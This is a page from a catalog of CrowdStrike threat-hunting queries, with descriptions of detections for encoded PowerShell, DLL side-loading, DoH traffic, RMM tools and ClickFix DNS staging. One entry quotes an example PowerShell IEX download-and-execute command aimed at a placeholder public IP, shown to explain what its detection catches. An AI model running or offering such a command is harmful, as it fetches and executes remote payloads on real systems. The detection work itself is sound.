EXPLORE DETECTIONS
139 detections found

CVE-2025-59287 vulnerable WSUS servers identification

This CQL query identifies WSUS servers that have the wsusservice enabled and that are vulnerable to CVE-2025-59287. Reference: https://www.reddit.com/r/crowdstrike/comments/1ohdzpm/comment/nlp7men/

CrowdStrike

Decode SignInfoFlags

The query decodes SignInfoFlags from Windows process events to identify signature details and highlight unsigned or improperly signed executables. Reference: [GitHub CrowdStrike/logscale-community](https://github.com/CrowdStrike/logscale-community-content/blob/main/Queries-Only/Helpful-CQL-Queries/Decode%20SignInfoFlags.md)

CrowdStrike

Decode VolumeDeviceCharacteristics Bitmask

The query decodes the VolumeDeviceCharacteristics bitfield to reveal device properties such as removable media, network drives, virtual volumes, or portable devices. Reference: [GitHub CrowdStrike/logscale-community](https://github.com/CrowdStrike/logscale-community-content/blob/main/Queries-Only/Helpful-CQL-Queries/Decode%20VolumeDeviceCharacteristics%20Bitmask.md)

CrowdStrike

Deleted Local User Accounts

Table of all deleted local user accounts including UserName, ComputerName, aid, aip, and LocalIP.

T1098
CrowdStrike

Detect and Decode Base64-Encoded PowerShell Commands

The query identifies Windows PowerShell executions using encoded commands, extracts and decodes Base64 payloads (including nested encodings), counts occurrences and unique hosts, and outputs decoded command content for analysis of potentially obfuscated activity. Reference: [GitHub CrowdStrike/logscale-community](https://github.com/CrowdStrike/logscale-community-content/blob/main/Queries-Only/Helpful-CQL-Queries/Decode%20Base64.md)

CrowdStrike

Detect and Decode Base64-Encoded PowerShell Commands - http

The query identifies Windows PowerShell executions using encoded commands, extracts and decodes Base64 payloads (including nested encodings), counts occurrences and unique hosts, and outputs decoded command content for analysis of potentially obfuscated activity. Reference: [GitHub CrowdStrike/logscale-community](https://github.com/CrowdStrike/logscale-community-content/blob/main/Queries-Only/Helpful-CQL-Queries/Decode%20Base64.md)

CrowdStrike

Detect Critical Environment Variable Changes over SSH with Connection Details

The query identifies changes to critical environment variables, extracts connection details such as user, local and remote IPs and ports, and provides a direct link to the related process in Falcon Process Explorer. Reference: [GitHub CrowdStrike/logscale-community](https://github.com/CrowdStrike/logscale-community-content/blob/main/Queries-Only/Helpful-CQL-Queries/Critical%20Environment%20Variable%20Changed%20SSH.md)

TA0003
CrowdStrike

Detect Data Exfiltration via external storage devices

This query shows unusual activity involving external storage devices, such as large file copy operations or bulk transfers to physical external media. While USB devices are common for legitimate use, adversaries may exploit them to exfiltrate confidential data outside normal monitoring channels. Such activity is especially concerning in restricted environments, as it bypasses network-based detection controls and can indicate an insider threat or physical compromise.

T1052
CrowdStrike

Detect locally disabled RTR

This query identifies hosts with locally disabled RTR.

CrowdStrike

Detect NTLMv1 Authentications

This query detects NTLM v1 authentications using Falcon ITP telemetry. Reference: [Closing the Door on Net-NTLMv1: Releasing Rainbow Tables to Accelerate Protocol Deprecation](https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-deprecation-rainbow-tables?linkId=38338466&hl=en)

CrowdStrike

Detect NTLMv1 Authentications (Windows Event Logs)

This query detects NTLM v1 authentications using Windows Event Log telemetry. Reference: [Closing the Door on Net-NTLMv1: Releasing Rainbow Tables to Accelerate Protocol Deprecation](https://cloud.google.com/blog/topics/threat-intelligence/net-ntlmv1-deprecation-rainbow-tables?linkId=38338466&hl=en)

CrowdStrike

Detect Remote Monitoring and Management (RMM) Tools over DNS

This query identifies the presence or execution of common RMM utilities (e.g., AnyDesk, TeamViewer, ConnectWise, ScreenConnect, Splashtop). While these tools are legitimate and widely used for IT administration, adversaries often abuse them as “living-off-the-land” remote access backdoors. Because they operate under the guise of trusted software and can blend with normal activity, malicious use of RMM tools may bypass traditional security controls, enabling persistence, data exfiltration, or hands-on-keyboard attacks.

T1219.002
CrowdStrike

Detect RTR High Risk Commands

Detects the execution of high-risk RTR commands such as:

- get
- put
- memdump
- xmemdump
- run
- put-and-run

CrowdStrike

Detect Suspicious Windows Command-Line Activity Using System Utilities

The query analyzes Windows ProcessRollup2 events to identify unusual use of common administrative tools (e.g., net.exe, sc.exe, nltest.exe, systeminfo.exe). It assigns behavior weights based on command-line patterns, aggregates activity per host and hour, flags systems with high or frequent activity, and provides direct links for host investigation in Falcon. Reference: [GitHub CrowdStrike/logscale-community](https://github.com/CrowdStrike/logscale-community-content/blob/main/Queries-Only/Helpful-CQL-Queries/Custom%20Weighting%20Command%20Line%20and%20File%20Name.md)

CrowdStrike

Detection of DNS Requests to AI-Related Domains

This query identifies DNS requests to domains listed in the AI-Domains.csv lookup. It filters out browser-initiated traffic from Chrome and Edge. The result highlights which hosts and processes are generating the most DNS requests to those domains. The query relies on a lookup file with at least one column named Domain; the lookup provides the set of AI-related domains to check against. Without this file, the match() operator cannot resolve which DNS requests should be considered relevant.

**Example**

| Domain |
|---|
| chat.openai.com |
| chatgpt.com |
| openai.com |
| claude.ai |
| anthropic.com |
| bard.google.com |
| *.ai |
| *.openai.com |

CrowdStrike

Detection of DoH traffic to known DoH-providers

This query identifies network traffic to well-known DoH endpoints (e.g., Cloudflare, Google, Quad9, Mozilla). DNS over HTTPS (DoH) encrypts DNS queries by tunneling them through HTTPS, making them indistinguishable from regular web traffic. While this improves user privacy, it also introduces blind spots for security teams: adversaries can use DoH to bypass DNS-based filtering, hide access to phishing domains, establish stealthy command-and-control channels, or exfiltrate data without triggering traditional DNS logs.

Why it matters:

- Phishing domains can be accessed without triggering DNS-based filtering.
- Command-and-Control (C2) communication can blend into normal HTTPS traffic.
- Data exfiltration becomes harder to detect as destination domains are hidden.

Impact on organizations: Without proper monitoring or controls, DoH can undermine DNS visibility, one of the most critical layers in network security, allowing threats to go unnoticed. Monitoring and alerting on DoH connections helps restore that visibility.

CrowdStrike

Detection of External Direct IP Usage in CommandLine Windows and Mac

This query detects Windows processes that utilize raw public IP addresses within HTTP/HTTPS URLs in their command-line arguments (e.g., powershell -c IEX(New-Object Net.WebClient).DownloadString('http://1.2.3.4/payload')). This behavior is highly suspicious because legitimate software typically uses domain names (DNS). Attackers often use direct public IPs to host second-stage payloads or C2 servers to bypass DNS filtering and logging mechanisms.

Key Logic Breakdown

- Scope & Filter: Targets Windows process creation events (ProcessRollup2) and filters for command lines containing http.
- Exclusions: Removes known noisy applications (e.g., Chrome, HP Click, Umbrella) to reduce false positives.
- Extraction (Regex): Scans the command line to extract a URL formatted with an IPv4 address (e.g., http://x.x.x.x/...) and isolates the IP address from that URL into a field called Ipaddress.
- Public IP Validation: Uses !cidr(...) to exclude all standard private and reserved IP ranges (localhost, 10.x, 192.168.x, 172.16.x, APIPA, etc.), so the query only alerts on public/external IPs.
- Formatting & Triage: Generates a clickable ExecutionSummary that includes the parent process, the target image, and the specific command line, plus direct links (ProcessExplorer, GraphExplorer) to the Falcon console for immediate investigation.
- Aggregation: Groups the results by ComputerName, showing how many times the event occurred and the first/last time it was seen.

T1105
T1059
T1071.001
CrowdStrike

Detection of Generic User Account Usage

This query identifies the use of generic or shared user accounts by leveraging a predefined lookup file containing known default and non-personalized usernames (e.g., admin, test, root).

| Framework | Primary Reason | Specific Source / Control |
|---|---|---|
| PCI DSS | Individual Accountability | Requirement 8.2.1 |
| HIPAA | Traceability of PHI Access | 45 CFR § 164.312(a)(2)(i) |
| ISO 27001 | Privileged Access Control | Annex A 5.15 / 8.2 |
| NIST 800-53 | Risk Management | AC-2(9) |
| SOC 2 | Auditability | CC6.1 |

T1078
CrowdStrike

Devices in RFM state

CrowdStrike

Dll-Side Loading Detection Query

The query traces processes that write both DLL and EXE files to the same location while exhibiting masquerading behavior. Reference: [GitHub Aamir-Muhammad/CrowdStrike-Queries](https://github.com/Aamir-Muhammad/CrowdStrike-Queries/blob/main/Hunting-Queries/DLL-Side-Loading-Detection.md)

T1574.001
CrowdStrike

DNS Resolutions from Browser Processes

This query correlates web browser process executions with their DNS queries to identify which domains were resolved by browser processes on specific endpoints.

CrowdStrike

DNS Staging Detection: ClickFix-Inspired nslookup Execution

Detects nslookup activity used for DNS-based staging, specifically targeting the pattern of querying external nameservers to retrieve and execute malicious payloads, as seen in recent ClickFix attacks. This hunt is highly valuable as it identifies a shift away from heavily monitored tools like mshta and PowerShell toward abusing trusted network utilities to bypass standard firewalls and blend with legitimate DNS traffic.

- Targeting trusted binaries: Monitors nslookup.exe, which attackers now prefer because it is less likely to be blocked by security software than mshta or PowerShell.
- External DNS Queries: Specifically looks for nslookup commands that provide a direct IP address for an external nameserver, bypassing the system's default, monitored DNS resolver.
- Staging Pattern: Detects the use of findstr on the nslookup output, a known ClickFix technique to parse the "Name:" field from a DNS response and treat it as a secondary command for execution.
- Execution Chain: Monitors for the piping of this output directly into execution engines like PowerShell or IEX.
- Evasion Detection: DNS traffic is frequently allowed through corporate firewalls, making this a "lightweight staging channel" that effectively hides data exfiltration and payload delivery in plain sight.

To test your query, run nslookup -q=txt google.com 1.1.1.1 in a command prompt. This triggers the detection by requesting a TXT record while bypassing local DNS to use an external IP. Wait a few minutes for the telemetry to ingest, then run your search to confirm the activity appears in your results.

T1071.004
T1059.001
T1204.002
CrowdStrike

Domain Controllers with high load

Domain controllers where either average CPU usage or average RAM usage exceeds 80%, or available disk space is below 10 GB. This indicates low capacity or unexpected excessive usage.

CrowdStrike

Enriched Process Tree Association Events

The query filters for AssociateTreeIdWithRoot events, joins them with detection-pattern metadata from a CSV file, and outputs key fields like timestamp, host, pattern details and severity for analysis. In short, it enriches process-tree association events with contextual detection information.

[AssociateTreeIdWithRoot](https://docs.crowdstrike.com/r/associatetreeidwithroot): This event is generated when there is a detection in the sensor. It has a data field called PatternId that contains a pattern ID; pattern IDs correspond to a detection. Reference: [GitHub CrowdStrike/logscale-community](https://github.com/CrowdStrike/logscale-community-content/blob/main/Queries-Only/Helpful-CQL-Queries/AssociateTreeIdWithRoot%20to%20Pattern%20Details.md)

CrowdStrike
Page 2 of 6